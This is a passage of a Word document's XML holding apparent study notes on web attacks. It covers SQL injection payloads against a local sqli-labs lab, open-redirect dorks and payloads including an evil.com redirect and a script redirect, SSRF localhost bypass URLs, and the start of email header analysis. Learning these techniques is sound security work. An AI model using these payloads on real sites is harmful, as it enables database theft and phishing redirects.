    <w:p w14:paraId="000005E0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005E1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">1' --+ </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>' LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005E2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005E3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=1' --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005E4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005E5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Now we have a single space to inject our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005E6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005E7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=1'_--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005E8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005E9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">6. to inject </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005EA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Order by </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005EB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Union </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="000005EC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005ED" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=1'order by 1--+</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>No error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005EE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005EF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=1'order by 2--+</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>No error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005F0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005F1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=1'order by 3--+</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>No error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005F2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005F3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=1'order by 4--+</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>We get error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005F4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005F5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we know there are 3 columns in the table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005F6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005F7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005F8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Union Select - To find out which column in vulnerable out of the 3 columns present</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005F9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005FA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://192.168.1.102/sqlilabs/Less-1/?id=1'union select 1,2,3--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005FB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005FC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Column 2,3 are vulnerable, so we can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> codes to get needed details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005FD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000005FE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">http://192.168.1.102/sqlilabs/Less-1/?id=1'union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1,database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(),version()--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000005FF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000600" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000601" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>single quote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000602" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1'or'1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000603" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000604" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>'1'or'1'='1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000605" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000606" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000607" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000608" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>OPEN REDIRECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000609" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000060A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> also known as "Unvalidated redirects and forwards"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000060B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000060C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Need for redirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000060D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Login / logout of an account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000060E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Create / register </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>forn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ew</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000060F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- When you reset password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000610" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000611" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.abc.com/login.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000612" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.abc.com/signin.html/?redirect=www.abc.com/profile&amp;id=123/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000613" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000614" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000615" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Types of HTTP status codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000616" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2XX</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000617" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3XX</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Moved to some other page / redirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000618" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4XX</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Client side</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000619" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>5XX</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Server side</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000061A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000061B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Redirection - 302</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000061C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000061D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Google dorks for redirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000061E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>url,return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,next,redirect,return_url,referrer,targeturl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000061F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000620" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>site:abc.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inurl:redirect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000621" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000622" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>?target=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000623" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000624" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://account.box.com/login?redirect_url=http://bing.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000625" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://login.i-ready.com/login?redirect_url=%2Fstudent%2Fdashboard%2Fhome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000626" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000627" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://flipkartt.com/products?mobile_item=iphone&amp;tech=india&amp;dshbfghdshfg&amp;redirect=https://evil.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000628" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000629" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>METHODS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000062A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- HEADER BASED / THROUGH PATH FRAGMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000062B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">it involves us in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fuxing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of the vulnerable website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000062C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000062D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.abc.com</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">actual </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000062E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.abc.com/bing.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000062F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.abc.com/bing.com//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000630" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.abc.com//bing.com//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000631" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.abc.com//bing.com///</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000632" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.abc.com///bing.com///</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000633" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.abc.com///bing.com////</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000634" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.abc.com////bing.com////</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000635" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000636" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>or we can also encode our user input as follows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000637" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Single URL </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00000638" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>if http://bing.com/ is our input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000639" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http%3A%2F%2Fbing.com%2F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000063A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000063B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Double </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> encode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000063C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http%253A%252F%252Fbing.com%252F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000063D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000063E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Base64 encode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000063F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>aHR0cDovL2JpbmcuY29tLw==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000640" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000641" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000642" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://abc.com/?redirect=aHR0cDovL2JpbmcuY29tLw==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000643" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000644" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000645" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- JAVA SCRIPT BASED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000646" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">This we can give in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which have input parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000647" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000648" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000649" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1/abc.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000064A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We can give the below script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000064B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="http://bing.com"&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000064C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000064D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000064E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Server Side</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000064F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Involves in interacting directly with the server using attacker commands and trying to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>retreive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000650" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000651" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">CSRF - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Client side</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> request forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000652" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Involves in user configuration &amp; security issues with regards to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000653" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000654" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Server Side</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000655" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://127.0.0.1/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000656" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://2130706433/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000657" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>http://017700000001/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000658" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000659" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000065A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000065B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>17-11-2021, WEDNESDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000065C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000065D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>EMAIL HEADER ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000065E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">The easiest way for finding the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>orginal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sender is by looking for "X-ORIGINATING-IP HEADER"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000065F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000660" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">1. Return-Path: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000661" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The email mentioned in the return path should be same as that of the sender domain or subdomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000662" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000663" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>sender email - sankar@abc.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000664" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>return path email should be - sankar@abc.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000665" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>or it can be any of the subdomain of abc.com</w:t>
      </w:r>
    </w:p>
